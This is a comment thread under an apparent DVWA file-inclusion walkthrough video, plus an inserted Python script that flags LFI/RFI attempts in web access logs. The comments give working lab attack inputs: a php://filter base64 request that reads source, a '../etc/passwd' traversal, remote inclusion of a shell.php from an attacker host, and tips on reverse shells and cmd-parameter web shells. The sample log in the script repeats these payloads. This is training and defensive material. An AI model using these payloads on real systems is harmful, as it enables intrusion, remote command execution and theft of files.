Had a few questions about Quote 3 missing - apologies I missed this in the initial video! For anybody stuck at this point take a look at these resources:
www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/
highon.coffee/blog/lfi-cheat-sheet/#php-wrapper-phpfilter
book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-rfi-using-php-wrappers
Essentially we want to read the code of fi.php, not execute it! We can use some of the PHP filter tricks from cheatsheets above to achieve this e.g.
127.0.0.1/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php
Then base64 decode the result in whatever way you prefer and see the missing quotes 😉
@johnstyl
3 years ago
I have been looking for a way to get the third quote by myself since I wanted to just cat the file with the reverse shell, but I'm running DVWA in docker and can't easily find php.ini. Can't believe I didn't see this comment, great vid btw
@_CryptoCat
3 years ago
@johnstyl thanks mate 🥰
@pawelk3k
1 year ago
This RFI blows my head 🤯🤯 Thank you for these videos!
@_CryptoCat
1 year ago
🙏🥰
@f0rty7even9
2 years ago
Great video. I'm learning quite a lot. Thank you for providing such information for free. For the guys asking about the hidden line 3; we got a reverse shell on the system, you can "cd" to the hackable folder and "cat" the contents of the "fi.php" file. That way, you'll read the source code behind the file itself, which will expose the hidden line, e.g.
$ cat /var/www/html/dvwa/hackable/flags/fi.php
Of course, this is the full path to the file on my VM. Replace the path to match your system setup :)
@jasonho2928
3 years ago
Really grateful for all your DVWA videos!!
@asaduzzamanjony9107
7 months ago
26:00 It solved my issue. Thank you.
@adamflitch4681
3 years ago
Worked! Thanks a lot, just saved me
@thepetiteotaku
9 months ago
I don't fully understand why you needed to start a Python server? Also, why can we not see the other php file when you checked port 9000, why can we only see shell.php?
@_CryptoCat
9 months ago
It's been a long time since I made this *but* I might have used the HTTP server to verify that the server could make an outbound connection before trying a shell, so that if the shell doesn't work we know it's likely the shell itself, rather than the server's inability to make remote connections.
@thepetiteotaku
9 months ago
@_CryptoCat thank you for explaining!
@nxsaad3422
7 months ago
The PHP function allow_url_include is not enabled. What do I do?
@_CryptoCat
7 months ago
IIRC the settings were covered in the intro ep, but you could also check the docs.
@nxsaad3422
7 months ago
Thanks for your reply 🥰. I fixed my problem in another way
@gordonrogers8118
3 years ago
Great walk-through! What about Quote 3, though? It's still hidden.
@gordonrogers8118
3 years ago
I was able to go back to the command injection page and display the file, but I can't seem to get it using only the file inclusion.
@_CryptoCat
3 years ago
oh yeh good point! you might be able to use some tricks to read the php file source code, check this out - infinitelogins.com/2020/04/25/lfi-php-wrappers-to-obtain-source-code/
@kao9698
3 years ago
@gordonrogers8118 just open the fi.php file when you get a shell with RFI
@steaders82
2 years ago
Hi. I'm running my DVWA as a docker. My shell.php works except for the last part /bin/sh. Any ideas for docker hosted reverse scripts please 🇬🇧
@_CryptoCat
2 years ago
Hi mate, I'm not 100% sure but you probably need to have the shell connect back to your docker IP address, rather than your VM IP address. If you run docker container with -it flag it should give you a shell: docs.docker.com/engine/reference/commandline/exec/
@HelloWorld-tx3xl
1 year ago
It's a helpful and great video! Unfortunately, I have some questions from when I tried RFI with a reverse shell. Would it be possible to get any contact method for you?
@_CryptoCat
1 year ago
You can ask questions here if you want, they might help other people who watch the video in future 🙂
@HelloWorld-tx3xl
1 year ago
@_CryptoCat Oh no! My reply has disappeared! KZitem...let me write down the comment, please!🥲 OK! Thank you for your reply! I run DVWA by vulnerables/web-dvwa docker, and Setup Check are both Enabled. In addition, I could successfully RFI through visiting the google page. However, my python http server and nc couldn't get any message, even though the PHP file is just "Hello World!". Do you have any idea or suggestion?
@_CryptoCat
1 year ago
The comment was sent to the "held for review" section 🙄 Got it now! If you run DVWA within a docker container, you'll need to also run the python http server and nc inside of that docker instance (as by design, you shouldn't be able to communicate with your host OS from the container). You can run commands inside the docker with docs.docker.com/engine/reference/commandline/exec
@HelloWorld-tx3xl
1 year ago
@_CryptoCat Got it! Thank you very much! 🥰
@Kinoti9
3 years ago
Wow! I was having trouble getting a shell back because of the contents of shell.php. I had to change those to match exactly yours. In a real world scenario the allow_url_include has to be turned on for this to work, right? What if it's turned off, do you know of any way to work around this? Thanks
@_CryptoCat
3 years ago
yep exactly! for PHP you would need allow_url_include enabled for RFI to work but LFI may still be possible without it. require, require_once, include and include_once are vulnerable functions so look out for these when no other form of input validation is in place 😉
@Kinoti9
3 years ago
@_CryptoCat thanks brother, always learning a lot from you
@_CryptoCat
3 years ago
@Kinoti9 🥰
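Added example, not part of the original comments or the video: the reply above points at include/require calls with no input validation, and the pinned comment shows a php://filter request against the `page` parameter. This is a defender's check that flags such `page` values in web-server access logs; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines; 198.51.100.7 and 203.0.113.5 are documentation addresses.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1523',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2931',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php HTTP/1.1" 200 1840',
    '198.51.100.7 - - [01/Jan/2024:10:00:14 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://203.0.113.5:9000/shell.php HTTP/1.1" 200 1410',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
WRAPPER_RE = re.compile(r"^(php|data|expect|zip|phar|file)://", re.I)
REMOTE_RE = re.compile(r"^(https?|ftps?)://", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")


def classify_page_value(value):
    """Return the reasons a `page` value looks like an LFI/RFI attempt."""
    for _ in range(2):  # undo nested percent-encoding left after parse_qs
        value = unquote(value)
    reasons = []
    if WRAPPER_RE.match(value):
        reasons.append("stream-wrapper")
    if REMOTE_RE.match(value):
        reasons.append("remote-url")
    if TRAVERSAL_RE.search(value):
        reasons.append("path-traversal")
    return reasons


def scan(lines, param="page"):
    """Return (request target, reasons) for every log line worth an alert."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query).get(param, []):
            reasons = classify_page_value(value)
            if reasons:
                findings.append((match.group(1), reasons))
    return findings


if __name__ == "__main__":
    for target, reasons in scan(SAMPLE_LOG):
        print(", ".join(reasons), "<-", target)
```

A hit on "remote-url" is only exploitable when allow_url_include is enabled, but it is still worth alerting on because it shows someone probing the parameter.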
@dogukanozturk7025
5 months ago
Thank you @_CryptoCat :)
@pennyWise_01
2 years ago
Hey, where do you get those shell.php files? I tried using msfvenom but I couldn't get any reverse shell :(
@_CryptoCat
2 years ago
Quite often I'll just use a really simple shell.php containing: Then pass the system command as a get parameter, e.g. victim.oops/?cmd=whoami For more web shells: github.com/swisskyrepo/PayloadsAllTheThings For reverse shells, this site is great: www.revshells.com 😉
@pennyWise_01
2 years ago
@_CryptoCat Thank youuu I love your videos
@_CryptoCat
2 years ago
@pennyWise_01 thank you 🙏🥰
@ProCook703
10 months ago
Word of advice: never hold the arrow key to scroll like you did in this video, it takes too long. Instead do ctrl+A and ctrl+E
@_CryptoCat
10 months ago
Haha yeh these shortcuts save so much time 🙌
@lo-tr2zn
2 years ago
Hey, the local file inclusion doesn't seem to work for me in low level. I'm trying this: "?page=../../../../../../etc/passwd". It's not working, it only says no such file or directory
@_CryptoCat
2 years ago
Just to double-check, you are on Linux rather than Windows? Have you tried any other files?
@lo-tr2zn
2 years ago
@_CryptoCat Oh yeah, I did try other files; also I was on Windows, which was the main cause. I'm currently researching the Windows file system, but if you know the alternate version of etc/passwd for Windows you could tell me
@lo-tr2zn
2 years ago
hmm, seems to get a permission denied
@lo-tr2zn
2 years ago
@_CryptoCat managed to find the etc/passwd and managed to install a reverse shell, THIS IS AWESOME!
Comments: 45